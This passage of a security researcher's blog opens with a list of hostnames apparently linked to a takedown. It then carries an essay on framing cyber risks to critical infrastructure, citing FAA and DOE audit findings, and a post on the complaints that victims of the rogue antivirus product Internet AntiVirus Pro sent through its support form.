server8.dollarsonthenet.net
server9.dollarsonthenet.net
serverfarm.pubblica.istruzione.it
sitemail.hostway.com
smsforlife.matssoft.co.uk
sponsorlusms.turkcell.com.tr
sprint.ehosts.net
srv25.trwww.com
secure.turhost.com
suze.ucs.louisiana.edu
webhosting.icicibank.com
webmail-au.server-secure.com
webmail.makromarket.net
webmail.ruc.dk
webmailcluster.perfora.net
webserver.afyon.bel.tr
webserver.zeytinburnu.bel.tr
websms.djezzy.com
www.adbrite.com
www.bostonmarketjobs.com
www.cart32hostingred.com
www.domaindiscount24.net
www.foundationapi.com
www.garantiserver.com
www.gmarket.co.kr
www.gmarket.com.sg
www.godaddy.com
www.handelsregister.de
www.hc.ru
www.host.net.tr
www.hostelsclub.com
www.jetsms.net
www.kaynaksms.com
www.limitsizhosting.com
www.lloydspharmacy.com
www.members.hostiga.com
www.nic.lv
www.nic.ru
www.nic.tr
www.register.bilgi.edu.tr
www.smsodyssey-a01.com
www.speakerrepair.com
www.teknoserver.net
www.topmarketer.net
www.voshost.com
www.webmarket.com.tr
www.webmarketplace.de
www.websms.com.tr
www1.soriana.com

The .ws registrar has suspended the domain names, the Chinese CERT appears to have taken action against the command and control server residing in their IP space, and AusCERT has been a great help with notification. (And thanks to Jose Nazario too).

In a very interesting paper for the International Risk Governance Council, Ortwin Renn describes a framework that provides an “analytic structure for investigating and supporting the treatment of risk issues.” Renn argues that risks are “mental ‘constructions’” in which actors link signals from the real world with “experience of actual harm” along with “the belief that human action can prevent harm in advance.” Therefore, how actors come to understand threats and risks is critical for it affects risk governance. Renn defines “risk governance” as follows:

On a national scale, governance describes structures and processes for collective decision-making involving governmental and non-governmental actors (Nye and Donahue 2000). Governing choices in modern societies is seen as an interplay between governmental institutions, economic forces and civil society actors (such as NGOs). At the global level, governance embodies a horizontally organised structure of functional self-regulation encompassing state and non-state actors bringing about collectively binding decisions without superior authority (cf. Rosenau 1992; Wolf 2002).

Renn suggests that there are four phases of of risk governance: pre-assessment, appraisal, tolerability and acceptability judgement, and management. My interest at this point is in the pre-assessment phase. How do we come to understand the nature of cyber threats to critical infrastructure (CI) and how do we assess the risks it poses? Framing is a critical component of the pre-assessment phase for it determines what information is relevant, and how risk is perceived. It shapes how we come to understand threat, and indicates a direction of action.

Framing

Cyber threats, and in particular cyber threats relating to CI, have been largely framed in polar opposite extremes.

On one end of the continuum we have those who believe cyber threats to be nothing more than a nuisance. It is not uncommon to hear “our systems are well protected”, followed by “everyone gets a virus every now and then” and finally “well, our critical systems are firewalled, air-gapped, not connected to the Internet.” In this case threats are treated as “standalone” cases that are largely technical in nature.

From such a perspective, technical considerations take precedence over who might be behind the attacks, what the motivations of the attackers are, and the what the consequences of cyber intrusions are — for example, what could the attackers have done with the level of access obtained, or the documents stolen, and contacts harvested. This results in under estimated risk, de-prioritization, and sometimes even inaction.

On the other side you’ll hear that China/Russia/Hackers – whatever the flavour of the day is – have thoroughly infiltrated CI and can “shut down the electrical grid” or “crash airplanes into one another” or … insert catastrophe here.

From this perspective, political persuasions concerning attribution are prioritized over technical considerations. The scenarios used to illustrate the threat are often ill-conceived, and do not reflect the technical and operation environments they are meant to address. Rather than focus on “boring” details, this perspective seeks to lay blame on external sources. This results in over estimated risk, sometimes resulting in disbelief and therefore inaction, or when it does spur action, often focuses on the wrong threats.

For example, some often quote the case of the Australian sewage hacker. An attacker managed to compromise a waste management system near Brisbane, Australia and intentionally caused millions of litres of raw sewage to spill out over the suburb of Sunshine Coast. Many, including the WSJ, suggest, “what if hackers located in China or Russia were able to conduct attacks like this here?”

Well, it turns out that the “hacker” in this case was an insider: he was “employed by the company that had installed the system” that he later “hacked” and he had specialized knowledge of the system. Moreover, the attack did not occur over the Internet, in fact the attacker issued commands over radio and had to be within a 25 mile radius – something that doesn’t apply to hackers operating out of China or Russia. Security solutions focusing solely on external threats would not have protected this installation in this case.

Re-framing the problem reveals a much more complex threat landscape. CI faces “integrated threats” which encompass the intersection of cyberspace and “meatspace”. The “cyber” threat is not purely digital. Nor is the threat limited to only emergencies or catastrophic events.

CI encompasses the private and public sectors and is increasingly reliant on Internet connectivity (in some capacity). Government relies on networks operated by private firms, which contract with other private firms and so on. “Ownership” of the cyber security process is distributed across all the entities responsible for the setup and installation of these systems, through to operations and maintenance.

In addition, individual operations are reliant on others – something that the Northeast Blackout of 2003 demonstrated so vividly. The operations of Canadian CI were negatively impacted due to the operations of, in this case a foreign, operation.

This same lesson applies to cyberspace.

Therefore defence needs to be conceptualized not just in terms of firewalls and IDS but also the security of the operations at each stage (computer security, software security, the tools used during installation, remote access for maintenance, and connection from “trusted” operators) as well as the “insider” threat.

The good thing is that this re-framing is occurring. There are now a variety of public documents that serve as an early warning of the potential threat CI faces – I’ll briefly discuss two of them:

1. A report by the Department of Transportation’s Inspector General that documents a variety of attacks against and vulnerabilities in the FAA’s air traffic control system (May 2009)

2. A report commissioned by the Department of Energy investigating common cyber security vulnerabilities control systems (November 2008)

Early Warning

The DOE report documented successful attacks that have affected FAA networks . In 2006 the FAA shutdown a “portion of its ATC systems in Alaska” due to a “viral attack” and in 2008 FAA computers, again in Alaska, were compromised and 40,000 username and passwords were stolen. In 2009 a “a FAA public-facing Web application computer” was compromised leading to the theft of “PII on 48,000 current and former FAA employees.”

Vulnerabilities were found during an audit in various web-applications that would have allowed attackers to access the data stored on those computers – this included public facing systems such as those which list “communications frequencies for pilots and controllers” as well as internal systems used by the FAA:

• Unauthorized access was gained to information stored on Web application computers associated with the Traffic Flow Management Infrastructure System, Juneau Aviation Weather System, and the Albuquerque Air Traffic Control Tower;
• Unauthorized access was gained to an ATC system used to monitor critical power supply at six en route centers; and
• Vulnerability found on Web applications associated with the Traffic Flow Management Infrastructure system was confirmed, which could allow attackers to install malicious codes on FAA users’ computers.

Accoring to the report, “[t]his occurred because (1) Web applications were not adequately configured to prevent unauthorized access and (2) Web application software with known vulnerabilities was not corrected in a timely matter by installing readily available security software patches released to the public by software vendors.”

The report on common cyber security vulnerabilities in control systems for the DOE identified similar issues along with serious issues concerning the use of plain text communications protocols and the lack of security surrounding remote access systems. The report found:

“If compromised, an attacker could utilize these systems to cause catastrophic damage or outages directly or by exploiting paths to critical end devices or connected SCADA systems.”

Typically the network environment is divided into a “business LAN” and a “control system LAN” with a firewall in between. Sometimes, a DMZ, is created to share data between the corporate and control system LANs.

The report found that:

• Firewall and router filtering deficiencies include access to control system components through external and internal networks. (Unrestricted telnet access allowed to DMZ network equipment and misconfigured VPNs and that remote desktop passwords were common between security zones (corporate and control system networks)
• It was possible to escalate privileges from a non-control system application remotely published by the display application to a control system application.
• A malicious user who has physical access to an unsecured port on a network switch could plug into the network behind the firewall to defeat its incoming filtering protection.

A very interesting theme throughout the report was the focus on remote, trusted endpoints. The report found that the Inter-Control Center Communications Protocol (ICCP), “an open protocol used internationally in the electric power industry to exchange data among utilities, regional transmission operators, independent power producers, and others” uses plain text and that such connections should be treated as “untrustworthy” and placed in a separate DMZ.

In other words, operators within the industry treat remote connections between them as trustworthy, bypassing the security procedures in place. This means that even if your operation is relatively secure, an attacker may be able to bypass it by compromising a less secure peer.

Determining risk in cyberspace is difficult. Attacks occur everyday.

Attackers may be highly skilled and well resourced adversaries or simply opportunistic amateurs. Some are professional cyber criminals, others are motivated by politics or status within their community. Still others may be engaged in espionage or data theft and have ties to state governments. Attacks may be largely symbolic, intended to intimidate, or they may aim to cause disruption or destruction.

An attack that may seem insignificant may have much larger consequences.

Knowing the degree of risk posed by attackers — ascertaining the “who” and “why” — is critical for mounting an effective response. To be clear, understanding why an attack occurred should not be used as an excuse such as “why would anyone attack poor old me” to limit or restrict corrective measures. Rather, it is used to situate the attack in a broader perspective which may indicate why the target was chosen and what the attacks may aim to do with the information/data they have extracted.

Understanding a single attack is only one component of establishing a complete threat picture.

In order to develop a better understanding of the rapidly changing risks and threats in cyberspace, ongoing monitoring and analysis is required. Rather than a static assessment, or a singular incident response, such threat mapping is better conceptualized as an iterative interrogation process in which old and new data are examined for meaningful relationships and new evidence.

Cyber threats to CI exist, don’t get me wrong, but the the emphasis need not be on an unlikely catastrophic event like “cyber-Katrina” or a “cyber-911” or a “digital-Pearl Harbor.” There are numerous vulnerabilities to be exploited, they probably are being exploited.

The good news is that they are often remedied through the implementation of best security practices. The bad news is that “boring” security concerns do not capture the imagination of policy makers and bureaucrats responsible for committing resources to fix security issues.

Still, this is not an excuse to conjure up fiction, even if the goal is to spur corrective action in the right direction.

We need to find the right framing that captures the attention of policy makers but that accurately reflects the threats and vulnerabilities to CI.

We need to change the perception of security as something that’s brought in to “fix” an emergency or as a response to catastrophe. It needs to be part of the development, implementation, and operation of CI. Considering the sorry state of affairs, I do think that scenarios can be useful tools to help policy makers understand the nature of the threat. However, they need to be realistic – they need to reflect the operational environment of CI. If they are just hype they are in the best case just useless and in the worse case actually a detriment.

Internet AntiVirus Pro is rogue anti-virus software that is uses fake scans and threats to entice users into downloading and purchasing the software. Moreover, IAV uses intermediary sites that force users to download the software. there is no easy way to uninstall the software and the IAV demonds that people pay to receive software that can uninstall the software that they never wanted in the first place. (For more about these guys read Dancho Danchev’s blog).

The “Support” form on IAV web sites stores submissions from users in a web accessible directory.

The 1200+ submissions found on one server mostly focused on the inability to remove the software and that fact that they either installed it by mistake or had no idea how the software was installed.

Some are polite…

Subject: Removal
Content: Please remove this file from my system. I had run this by mistake. I already have my own antivirus. Thanks!
Country:CA

Some are not so polite…

Subject: fuck this shit
Content: get this shit off my computer, now!!!!
Country:US

Overall, people are extremely frustrated and unsure of what to do. Some seem to believe that this is a real anti virus product — some even ask if they are related to other real anti virus products. Many also indicate that they already have AV products installed.

Others recognise that it is a scam but are unable to do anything about it. Many state that it was their children that installed the software thinking they were doing their parents a favour. They also describe how it is interfering with their businesses, education and general computer usage.

What outrages people the most seems to be the fact that the rogue AV demands that you buy the software if you want to be able to uninstall it.

It is a good reminder that this stuff affects real peoples lives in a very unpleasant way.

Sorry about the downtime :)